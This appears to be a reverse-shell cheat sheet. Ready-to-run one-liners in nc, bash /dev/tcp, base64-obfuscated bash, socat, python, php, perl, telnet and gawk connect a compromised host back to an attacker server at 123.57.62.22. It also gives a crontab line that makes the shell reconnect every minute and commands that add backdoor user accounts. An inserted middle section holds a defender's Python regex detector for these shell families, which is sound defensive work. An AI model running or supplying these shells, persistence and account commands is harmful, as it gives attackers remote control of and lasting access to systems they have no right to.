nc reverse shell
When nc has no -e option
The VPS listens first
VPS:
nc -lvp 2333
Internal host:
rm /tmp/f -rf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 123.57.62.22 2333 >/tmp/f
or
mknod backpipe p; nc 123.57.62.22 2333 0<backpipe | /bin/bash 1>backpipe 2>backpipe
When nc has the -e option
VPS:
ncat -lv 2333
Internal host:
nc -e /bin/bash 123.57.62.22 2333
bash
VPS:
ncat -lv 2333
Internal host:
bash -i >& /dev/tcp/123.57.62.22/2333 0>&1
or base64-encoded (the encoded string decodes to the same bash -i one-liner above):
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuNTcuNjIuMjIvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}
socat
VPS:
socat TCP-LISTEN:12345 -
Internal host:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22:12345
When the internal host has no socat (download a static binary first):
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod 755 /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22:12345
Scripting languages:
VPS:
nc -lvp 8080
Internal host:
python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.57.62.22",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
or, to upgrade an existing shell to a pseudo-terminal (this line does not connect back by itself):
python -c "import pty;pty.spawn('/bin/bash')"
php:
php -r '$sock=fsockopen("123.57.62.22",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
perl:
perl -e 'use Socket;$i="123.57.62.22";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
telnet:
VPS:
nc -vlp 1080    (window that displays command output)
nc -lvp 8080    (window where commands are typed)
Internal host:
telnet 123.57.62.22 8080 | /bin/bash | telnet 123.57.62.22 1080
or, with a single listener on the VPS (nc -lvp 12345) instead of the two above:
mknod test p && telnet 123.57.62.22 12345 0<test | /bin/bash 1>test
awk (requires gawk; the /inet/tcp special file is a gawk extension):
VPS:
nc -lvp 12345
Internal host:
awk 'BEGIN{s="/inet/tcp/0/123.57.62.22/12345";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
crontab (installs a cron job that reconnects every minute):
VPS:
nc -lvp 12345
Internal host:
(crontab -l;printf "* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"123.57.62.22\",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n")|crontab -
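As an added defender-side example (not part of the original cheat sheet), the following Python script scans recorded process command lines for the reverse-shell families catalogued above (/dev/tcp redirects, named pipes wired to nc or telnet, nc -e, socat exec, interpreter socket shells, gawk /inet/tcp, base64-decoded commands). The sample command lines and the 203.0.113.10 address are constructed for the example.

```python
import re
from typing import Dict, List

# One pattern per family of one-liners in the cheat sheet above. They run
# against recorded process command lines (auditd/EDR telemetry), not packets.
INDICATORS = {
    "bash /dev/tcp redirect": re.compile(r"/dev/(tcp|udp)/[\w.\-]+/\d+", re.I),
    "named pipe wired to nc/telnet": re.compile(r"\b(mkfifo|mknod)\b.*\b(nc|ncat|netcat|telnet)\b", re.I),
    "nc -e shell": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+\S*sh\b", re.I),
    "socat exec shell over tcp": re.compile(r"\bsocat\b.*\bexec:.*\b(ba)?sh\b.*\btcp", re.I),
    "interpreter socket shell": re.compile(r"\b(python[23]?|perl|php)\b.*\b(socket|fsockopen)\b.*\b(dup2|exec|STDIN)\b", re.I),
    "gawk /inet/tcp socket": re.compile(r"\bawk\b.*/inet/tcp/", re.I),
    "telnet piped into shell": re.compile(r"\btelnet\b.*\|\s*/bin/(ba)?sh\b", re.I),
    "base64-decoded command piped to shell": re.compile(r"\bbase64\b.*-d.*\|.*\b(ba)?sh\b", re.I),
}


def detect_reverse_shell(cmdline: str) -> List[str]:
    """Return the names of every indicator that fires on one command line."""
    return [name for name, pat in INDICATORS.items() if pat.search(cmdline)]


def scan(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious command line to the indicators it triggered."""
    hits: Dict[str, List[str]] = {}
    for cmd in cmdlines:
        names = detect_reverse_shell(cmd)
        if names:
            hits[cmd] = names
    return hits


# Constructed sample command lines (not real telemetry); 203.0.113.10 is an
# RFC 5737 documentation address standing in for the attacker's VPS.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/203.0.113.10/2333 0>&1",
    "rm /tmp/f -rf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.10 2333 >/tmp/f",
    "nc -e /bin/bash 203.0.113.10 2333",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:203.0.113.10:12345",
    "php -r '$sock=fsockopen(\"203.0.113.10\",8080);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "awk 'BEGIN{s=\"/inet/tcp/0/203.0.113.10/12345\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'",
    "tar czf /tmp/backup.tgz /var/www",  # benign
    "nc -lvp 8080",  # benign on its own: a listener with no shell attached
]

if __name__ == "__main__":
    for cmd, names in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(names)} :: {cmd}")
```

The patterns are deliberately narrow, so pair them with process-tree context (a shell whose parent is a web server or cron, or whose stdio is a socket) rather than treating a single regex hit as proof.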
When the shell is not interactive-friendly
Add a user in one line
useradd newuser;echo "newuser:password"|chpasswd
e.g.: useradd guest;echo 'guest:123456'|chpasswd
useradd -p encrypted_password newuser    (-p expects a crypt(3) hash, not a plaintext password)
e.g.: useradd -p `openssl passwd 123456` guest